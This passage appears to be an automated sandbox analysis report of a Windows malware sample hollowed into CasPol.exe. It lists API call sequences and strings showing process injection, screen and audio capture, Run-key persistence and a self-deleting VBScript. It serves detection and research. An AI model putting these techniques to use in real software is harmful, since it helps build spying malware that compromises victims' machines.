                            • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                            Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                            • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                              • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                            • DeleteDC.GDI32(00000000), ref: 00418F2A
                            • DeleteDC.GDI32(00000000), ref: 00418F2D
                            • DeleteObject.GDI32(00000000), ref: 00418F30
                            • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                            • DeleteDC.GDI32(00000000), ref: 00418F62
                            • DeleteDC.GDI32(00000000), ref: 00418F65
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                            • GetIconInfo.USER32(?,?), ref: 00418FBD
                            • DeleteObject.GDI32(?), ref: 00418FEC
                            • DeleteObject.GDI32(?), ref: 00418FF9
                            • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                            • DeleteDC.GDI32(?), ref: 0041917C
                            • DeleteDC.GDI32(00000000), ref: 0041917F
                            • DeleteObject.GDI32(00000000), ref: 00419182
                            • GlobalFree.KERNEL32(?), ref: 0041918D
                            • DeleteObject.GDI32(00000000), ref: 00419241
                            • GlobalFree.KERNEL32(?), ref: 00419248
                            • DeleteDC.GDI32(?), ref: 00419258
                            • DeleteDC.GDI32(00000000), ref: 00419263
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 479521175-865373369
                            • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                            • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                            • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                            • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                            Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                            • GetProcAddress.KERNEL32(00000000), ref: 00418139
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                            • GetProcAddress.KERNEL32(00000000), ref: 00418161
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                            • GetProcAddress.KERNEL32(00000000), ref: 00418175
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                            • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                            • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                            • ResumeThread.KERNEL32(?), ref: 00418435
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                            • GetCurrentProcess.KERNEL32(?), ref: 00418457
                            • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                            • GetLastError.KERNEL32 ref: 0041847A
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 4188446516-3035715614
                            • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                            • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                            • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                            • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                            Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                              • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                              • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                            • ExitProcess.KERNEL32 ref: 0040D7D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                            • API String ID: 1861856835-332907002
                            • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                            • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                            • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                            • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                            Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                              • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                            • ExitProcess.KERNEL32 ref: 0040D419
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                            • API String ID: 3797177996-2557013105
                            • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                            • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                            • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                            • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                            Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                            • ExitProcess.KERNEL32(00000000), ref: 004124A0
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                            • CloseHandle.KERNEL32(00000000), ref: 0041253B
                            • GetCurrentProcessId.KERNEL32 ref: 00412541
                            • PathFileExistsW.SHLWAPI(?), ref: 00412572
                            • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                            • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                              • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                            • Sleep.KERNEL32(000001F4), ref: 00412682
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                            • CloseHandle.KERNEL32(00000000), ref: 004126A9
                            • GetCurrentProcessId.KERNEL32 ref: 004126AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                            • String ID: .exe$8SG$WDH$exepath$open$temp_
                            • API String ID: 2649220323-436679193
                            • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                            • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                            • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                            • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                            Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                            • SetEvent.KERNEL32 ref: 0041B219
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                            • CloseHandle.KERNEL32 ref: 0041B23A
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                            • API String ID: 738084811-2094122233
                            • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                            • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                            • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                            • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                            Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                            • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                            • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                            • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            • API String ID: 1602526932-4212202414
                            • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                            • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                            • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                            • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                            Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                            • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                            • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                            • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                            • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                            • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                            • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                            • API String ID: 1646373207-165202446
                            • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                            • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                            • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                            • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                            Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 0040CE07
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                            • _wcslen.LIBCMT ref: 0040CEE6
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040CF84
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                            • _wcslen.LIBCMT ref: 0040CFC6
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                            • ExitProcess.KERNEL32 ref: 0040D062
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open
                            • API String ID: 1579085052-4130102134
                            • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                            • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                            • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                            • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                            Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 0041C036
                            • _memcmp.LIBVCRUNTIME ref: 0041C04E
                            • lstrlenW.KERNEL32(?), ref: 0041C067
                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                            • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                            • _wcslen.LIBCMT ref: 0041C13B
                            • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                            • GetLastError.KERNEL32 ref: 0041C173
                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                            • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                            • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                            • GetLastError.KERNEL32 ref: 0041C1D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                            • String ID: ?
                            • API String ID: 3941738427-1684325040
                            • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                            • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                            • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                            • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                            Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$EnvironmentVariable$_wcschr
                            • String ID:
                            • API String ID: 3899193279-0
                            • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                            • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                            • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                            • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                            Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                            • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                            • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                            • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                            • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                            • Sleep.KERNEL32(00000064), ref: 00412E94
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$0TG$0TG$NG$NG
                            • API String ID: 1223786279-2576077980
                            • Opcode ID: 3d0323ce1c9d0b8fdd539b767e1f21648be4e9102a5c9b14e4e64c444153522c
                            • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                            • Opcode Fuzzy Hash: 3d0323ce1c9d0b8fdd539b767e1f21648be4e9102a5c9b14e4e64c444153522c
                            • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                            Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                            • LoadLibraryA.KERNEL32(?), ref: 00414E17
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                            • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                            • LoadLibraryA.KERNEL32(?), ref: 00414E76
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                            • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                            • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
